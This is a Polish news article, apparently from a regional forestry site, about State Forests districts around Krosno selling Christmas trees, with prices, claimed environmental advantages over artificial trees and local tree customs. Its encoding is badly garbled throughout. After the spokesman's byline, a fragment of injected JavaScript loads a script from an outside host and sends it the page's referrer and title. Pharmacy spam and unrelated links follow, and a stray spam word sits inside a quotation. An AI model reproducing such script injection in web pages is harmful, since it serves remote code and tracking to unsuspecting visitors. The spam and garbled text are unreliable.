RuszyAi??a sprzedaA? choinek w nadleAi??nictwach


Od poniedziaAi??ku w wiAi??kszoAi??ci nadleAi??nictw Regionalnej Dyrekcji LasA?w PaAi??stwowych w KroAi??nie leAi??nicy prowadzAi?? sprzedaA? choinek, gAi??A?wnie Ai??wierkowych, pochodzAi??cych prosto z lasu. W tym roku przygotowano do sprzedaA?y ponad trzy tysiAi??ce mAi??odych drzewek, wyhodowanych na specjalnych plantacjach choinkowych, zakAi??adanych na gruntach uA?ytkowanych przejAi??ciowo, np. pod liniami wysokiego napiAi??cia lub na gruncie porolnym.

Dla zainteresowanych przygotowano rA?wnieA? choinki sosnowe, cieszAi??ce siAi?? coraz wiAi??kszym powodzeniem. O szczegA?Ai??y naleA?y pytaAi?? w biurach nadleAi??nictw.

LeAi??nicy co roku sprzedajAi?? 3 do 5 tysiAi??cy choinek, o wysokoAi??ci od 1,5 do 5 metrA?w. NajwiAi??cej oczywiAi??cie tych pokojowych, za ktA?re trzeba zapAi??aciAi?? w nadleAi??nictwach 20-40 zAi??otych. Ceny ksztaAi??tujAi?? samodzielnie poszczegA?lne nadleAi??nictwa, kierujAi??c siAi?? zasadami rynku, uwzglAi??dniajAi??c poniesione koszty zaAi??oA?enia plantacji oraz pozyskania drzewek. TrafiajAi?? siAi?? rA?wnieA? zamA?wienia specjalne, na drzewka wyA?sze, powyA?ej 10 metrA?w, np. do ustawienia w koAi??cioAi??ach i miejscach publicznych. LeAi??nicy dostarczajAi?? teA? choinki do wielu instytucji publicznych, domA?w pomocy spoAi??ecznej itp. PrzykAi??adowo, NadleAi??nictwo Oleszyce dla szkA?Ai?? ze swojego terenu sprzedaje drzewka za symbolicznAi?? zAi??otA?wkAi?? plus VAT.
– SprzedaA? A?ywych choinek traktujemy jako element tradycji boA?onarodzeniowej, stAi??d nasze ceny drzewek uwzglAi??dniajAi?? jedynie koszty hodowli, pozyskania i transportu z lasu – wyjaAi??nia Edward Balwierczak, dyrektorAi?? RDLP w KroAi??nie. ai??i?? Chcemy teA? przypominaAi?? o ekologicznym charakterze A?ywej choinki, ktA?ra, nawet jeAi??li po kilku tygodniach opadnie z igieAi??, pozostaje wciAi??A? elementem naturalnym i przyjaznym czAi??owiekowi. Pozyskanie choinek w Lasach PaAi??stwowych w najmniejszym stopniu nie narusza rA?wnowagi ekosystemu leAi??nego. Pills

Warto przy tej okazji uAi??wiadomiAi?? sobie fakt, A?e do wytworzenia choinki sztucznej trzeba zuA?yAi?? ogromnej iloAi??ci energii i materiaAi??A?w chemicznych, w tym folii z substancjami zawierajAi??cymi wAi??giel i siarkAi??. StAi??d spore koszty Ai??rodowiskowe z uwagi na transport, zanieczyszczenie powietrza i wody w procesie chemicznej przerA?bki i duA?e zuA?ycie energii, a takA?e ogromne koszty przyrodnicze zwiAi??zane z ich utylizacjAi??. RozkAi??ad takiej choinki trwaAi?? bAi??dzie kilkaset lat. Natomiast A?ywa choinka to efekt wykorzystania uA?ytkA?w rolnych pod uprawAi?? drzewek, zaAi?? materiaAi??ami do jej wytworzenia jest gleba i dwutlenek wAi??gla. W trakcie caAi??ego procesu hodowli powstaje produkt uboczny – tlen oraz absorbowany jest dwutlenek wAi??gla z powietrza.

Tradycja choinkowa jest w naszym kraju doAi??Ai?? mAi??oda. PoczAi??tkowo na Podkarpaciu popularna byAi??a ai??zjodeAi??kaai??? lub ai??zjA?dkaai???, czyli wierzchoAi??ek drzewa zawieszony u powaAi??y izby. MiaAi??o toAi?? chroniAi?? dom i jego mieszkaAi??cA?w od zAi??ych mocy. W XIX wieku wAi??rA?d leAi??nikA?w w Karpatach istniaAi?? zwyczaj przynoszenia do leAi??niczA?wki wierzchoAi??ka jodAi??y lub Ai??wierka z pierwszego drzewa Ai??ciAi??tego na zrAi??bie. TakAi?? choinkAi?? osadzano przed domem i przystrajano kolorowymi papierkami lub torebkami nasiennymi miesiAi??cznicy trwaAi??ej (tzw. judaszowe srebrniki), co miaAi??o chroniAi?? siedzibAi?? leAi??niczego przed najAi??ciem wilkA?w.

Edward MarszaAi??ek – rzecznik prasowy RDLP w KroAi??nies.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; furosemide 40 mg tablet price cadian viagra no script http://imrdesenho.com/?p=4904 http://wpbartre.bartre.com/?p=3444 dilantin overdose treatment


Napisz komentarz:

"UWAGA! Komentarze niezgodne z regulaminem serwisu nie będą publikowane. Zachęcamy do kulturalnego wyrażania opinii na temat artykułów oraz unikania personalnych ataków słownych."